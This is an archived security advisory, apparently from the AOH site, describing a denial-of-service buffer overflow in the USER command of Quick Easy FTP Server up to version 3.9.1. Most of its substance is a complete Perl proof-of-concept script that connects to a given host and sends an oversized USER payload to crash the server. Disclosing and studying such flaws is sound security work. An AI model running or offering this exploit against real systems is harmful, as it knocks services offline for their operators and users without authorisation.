AOH :: HP Unsorted Q :: B1A-1645.HTM

Quick Easy FTP Server USER command Vulnerability



Quick Easy FTP Server USER command Vulnerability
Quick Easy FTP Server USER command Vulnerability



Software: Quick Easy FTP Server <=3.9.1
Vulnerability Published :2010-07-22
Vulnerability Update Time :2010-07-25
Vendor: No vendor response
Impact: Low
Bug Description:
Quick Easy FTP Server does not validate the USER command input size leading to a Denial Of
Service flaw while sending more than 1600 characters to it.
PoC:
****************************************************************
#!/usr/bin/perl -w
#DoS Exploit of Quick Easy Ftp Server version <=3.9.1 USER COMMAND Buffer Overflow
#Vulnerability Discoverer & Autor : demonalex[at]163[dot]com
use Socket;
$host=shift;
$port=shift || '21';
if(!defined($host)){
die("usage: $0 \$host [\$port]\n");
}
#$payload='A'x1604;
$payload=('A'x1600)."\x3D\x41\x41\x41";         #mov     dword ptr [ebx+4], ebp
$target_ip=inet_aton($host);
$target=sockaddr_in($port, $target_ip);
socket(SOCK, AF_INET, SOCK_STREAM, 6);
connect(SOCK, $target);
undef($content);
recv(SOCK, $content, 100, 0);                   #get ftp banner
send(SOCK, "USER "."$payload\r\n", 0);
printf("send ok!\n");
close(SOCK);
exit(0);
****************************************************************
Credits: This vulnerability was discovered by demonalex@163.com 
         Pentester/Researcher
         Dark2S Security Team/Venustech.GZ Branch


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.